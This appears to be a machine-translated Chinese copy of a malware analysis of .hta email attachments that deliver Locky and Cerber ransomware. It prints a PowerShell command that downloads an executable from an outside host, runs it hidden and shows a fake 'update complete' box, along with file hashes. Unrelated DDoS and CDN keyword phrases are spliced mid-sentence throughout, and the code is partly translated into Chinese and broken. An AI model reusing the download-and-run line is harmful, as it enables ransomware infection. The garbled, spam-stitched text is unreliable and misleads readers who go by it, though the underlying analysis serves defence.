来自 CC防护 2021-04-05 16:54 的文章

国内高防cdn_怎么防止_移动端安全防御

国内高防cdn_怎么防止_移动端安全防御

考虑到最近带有.hta附件的垃圾邮件数量的增加,如何设置ddos防御,我们决定跟踪一些由hta文件引发的感染。什么是HTA?HTA是HTML应用程序的缩写,它是基于HTML和Internet Explorer支持的一种或多种脚本语言的程序,通常是VBScript或JScript。.hta扩展名的默认文件关联是Microsoft HTML应用程序主机(mshta.exe). 如果您没有禁用或更改此文件关联,则实际上HTA文件在双击时的行为类似于可执行文件。HTA作为完全可信的应用程序运行,因此比普通的HTML文件拥有更多的特权。我记得的第一次感染是CWS.MS办公室2003年,网站防御ddos,一个HTA文件被隐藏在Fonts文件夹中,这个文件夹是由Run注册表项触发的。邮件附件HTA作为一种电子邮件附件感染的方法越来越流行。随着公众了解到运行Java脚本和Visual Basic脚本文件的危险性,ddos防御溯源,威胁参与者正在寻找新的攻击向量,最近,我们看到了以下新的附件:带有宏的Pub文件(Microsoft Publisher)WSF文件(Windows脚本文件)HTA文件下面是一个示例HTA文件,它看起来与我们通常看到的Java脚本文件没有太大区别:简单地说,将、和标记添加到Java脚本中。脚本尝试四个下载位置来获取一个Locky勒索软件感染者。同样,这些网站都被关闭了,但实际上每天都有新的网站建立起来。网站第二个.hta被截获并从一个客户的计算机上获取。根据VirusTotal的说法,它是在11-1-127413[dot]c[dot]cdn77[dot]org的野外发现的,在撰写本文的时候已经被查封了。这个文件有可能是嵌入在另一个网站上的,也可能是通过邮件发送的。HTA文件包含模糊处理的JS代码:此代码触发Powershell命令。父进程"-WindowStyle隐藏$d=$环境:温度+'s4a2924808f66985de3a9ad1e3d743e0d.exe';(新对象System.Net.WebClient).DownloadFile('https://ahtaeereddit.org/17/524.dat',$d);启动进程$d[System.Reflection.装配]::LoadWithPartialName('系统.Windows.Forms’);[系统.windows.forms.messagebox]::show('更新完成',"信息"[Windows.Forms.MessageBox按钮]●好的[系统.Windows.Forms.MessageBoxIcon]::信息);再一次,它试图下载并作为可执行文件运行的.dat文件不再可用,但是在VirusTotal上搜索该文件名时,会显示一些可能暗示kofter和Cerber感染者的候选文件。当它完成后,它会显示这个提示,让用户确信更新已经完成_补丁.hta),可能是作为googlechrome的更新或补丁提供的。摘要我们讨论了一些我们最近看到的HTA感染。以下是两种打开.hta文件导致文件被勒索软件加密的方法。没有什么特别的,但是可以考虑一个一般性的警告,宝塔能防御cc攻击,即恶意软件作者正在扩展他们用来扩展负载的文件扩展名的数量。文件详细信息Md5 WfTlZlB8.hta 99aee61d631e34ad609c6226da8b63a9Md5铬_补丁.hta8db221c5ec335f0df1c4a47d1b219f6a彼得阿恩茨

,防御ddos攻击的防火墙